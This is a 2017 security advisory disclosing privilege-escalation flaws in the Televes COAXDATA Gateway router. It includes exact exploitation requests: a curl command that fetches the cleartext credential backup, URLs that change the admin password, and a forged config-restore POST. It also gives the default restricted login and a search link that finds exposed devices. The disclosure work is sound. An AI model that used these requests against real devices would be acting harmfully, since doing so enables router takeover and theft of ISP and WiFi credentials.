Vulnerabilities in Televes COAXDATA GATEWAY – CVE-2017-6532

17 - Jul - 2017

===============================
– Advisory –
===============================

Title: Televes COAXDATA GATEWAY 1Gbps – Priv Escalation
Risk: High
Date: 19.Jul.2017
Author: Pedro Andujar (Tarlogic)
Twitter: @pandujar

Televes COAXDATA GATEWAY Introduction

Televes COAXDATA GATEWAY 1Gbps it is a router+WiFI device used by both, end-user and professional Internet Services
providers. According to the manufacturer:

“The CoaxData system enables the use of coaxial, PLC or fibre optics networks to distribute Internet services
to a certain number of points, providing a non-invasive distribution system that preserves the quality of the transmission.

CoaxData Home WiFi (ref. 769301) transforms the data signal distributed by the coaxial system in a wireless signal
through an Ethernet interface gateway or “Low Power WiFi”. Also it can be configured as a router and/ or Access Point.”

This device is widely used by WiMAX providers, Rural Internet access, etc … mostly in Spain,
Austria and Portugal..

Televes COAXDATA GATEWAY VULNERABILITIES – TECHNICAL DESCRIPTION

Televes COAXDATA gateway contains two default users, (Admin) to manage the device using either Web or ssh, and
a restricted one (username) with access to more basic features (local network only and WiFi).

Several ways have been identified that allow the restricted user to acquire or modify the password of the Administrator,
obtaining therefore access to the rest of credentials and being able to get root access to the underlying operating system
BusyBox, from where you can take full control of the device.

It has been proven that a large number of these devices are exposed on the internet, and they only change the administrator
password, leaving by default the restricted account (username / 123456), which allows with the issues described here, to gain
full control of the device and allowing access to other devices of the subdyacent internal network.

https://www.censys.io/ipv4?q=Televes+CoaxData+Wifi

Ref.769301 CoaxData 1Gbps-HDTV Coax+Wifi
doc-wifi-hgw_v1.02.0014 2016-02-02-14:01 – CD Firmware Version 4.20

Televes COAXDATA GATEWAY Vulnerability – ISSUE #1

Name: Backup Containing cleartext credentials is accessible by restricted user
Severity: High
CVE: CVE-2017-6532

This issue is in fact two, first one related to the lack of encryption when storing the user provided credentials wthin the
configuration file, second one regarding the lack of access control to the backup file that should be restricted to admin user.
This way after logging in with the default “username” credentials, you will only need to access the URL shown below, in order to
find cleartext users and passwords of WiFI, WPS pin value, WAN (internet provider) and the device Admin account:

pandujar@fogheaven:~$ curl https://192.168.2.1/mib.db | grep -i Password

InternetGatewayDevice.DeviceInfo.X_ATH-COM_TeleComAccount.Password -m 1 -d Changeme1 (Admin password)
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.Password -m 1 -d Changeme2 (ISP Password)
InternetGatewayDevice.X_ATH-COM_Account.UserPassword -m 1 -d 123456 (username password)

Televes COAXDATA GATEWAY Vulnerability – ISSUE #2

Name: Arbitrary password change
Severity: High
CVE: CVE-2017-6530

This is once more related insufficient access control and checks performed on the client side. Once logged in as the restricted user,
we can modify the Admin user password using the following request:

https://192.168.2.1/password.shtml?DeviceInfo.X_ATH-COM_TeleComAccount.Password=hax0rcito

In fact, the password change form, actually allows to modify any other property of the device configuration, for instance it would also
allow to Enable SNMP:

https://192.168.2.1/password.shtml?DoCSnmpAgent.Enable=1

Televes COAXDATA GATEWAY Vulnerability – ISSUE #3

Name: Unrestricted backup restore
Severity: High
CVE: CVE-2017-6531

The restoring backup and restart features lacks of access control, so the restricted user could modify the configuration
by setting the credentials of his choice taking advantate of this functionality:

POST /ReadFile.cgi HTTP/1.1

Host: 192.168.2.1

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Referer: https://192.168.2.1/resetrouter.shtml?DeviceInfo.AdditionalConfigVersion=default_cfg_v1.02.0014

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: multipart/form-data; boundary=—————————66789582480853432558488077

Content-Length: 42533

—————————–66789582480853432558488077

Content-Disposition: form-data; name=”cfgfile”; filename=”s”

Content-Type: application/octet-stream

InternetGatewayDevice.DeviceInfo.X_ATH-COM_TeleComAccount.Password -m 1 -d !dSR4ever

—————————–66789582480853432558488077

Content-Disposition: form-data; name=”LoadCfgFile”

Load

—————————–66789582480853432558488077–

Then performing the following request:

https://192.168.2.1/result.shtml?method=LoadCfgFile&result=0&cfgfile=/tmp/s1488261988

And finally rebooting the device:

https://192.168.2.1/result.shtml?method=Reboot

Televes COAXDATA GATEWAY Vulnerability – ISSUE #4

Name: Credentials sent by querystring
Severity: Low

Both, when logging in and changing password, credentials are passed through GET request (querystring), therefore they are cached
in the browsing history causing them to potentially been revealed by accident:

https://192.168.2.1/login?username=Admin&password=XXxXXXXxxX

Televes COAXDATA GATEWAY Vulnerability – ISSUE #5

Name: Weak session mechanism, based on source ip
Severity: Medium

After performing the authentication process no token or cookies are assigned to the client browser, but the server would recognize the user based
to its source ip address. With this mechanism, if a user is authenticated through internet, anyone who shares his browsing ip (ex: corporate proxies),
would has access to the device with the very same account of the legitimate user.

CHANGELOG

* 19/Feb/2017: – Vulns found.
* 27/Feb/2017: – Manufacturer contacted through their contact web-form.
* 28/Feb/2017: – Technical details sent on a 2nd contact attempt.
* 01/Mar/2017: – Manufacturer acknowledge the issues and stats that restricted user would be removed from future releases.
* 13/Jul/2017: – Follow up email related to resolution. No response.
* 20/Jul/2017: – Public Disclosure.

SOLUTIONS

It is recommended as a preventive measure to change the user name and password of the restricted user that comes by default, in addition to
block the administration web interface and SSH on the internet or untrusted networks.

Televes COAXDATA GATEWAY references

– COAXDATA GATEWAY 1Gbps
https://www.televes.es/en/catalogo/producto/coaxdata-gateway-1gbps

– Televes About US
https://www.televes.es/en/empresa/aboutus

Share this article

Facebook - Twitter - Linkedin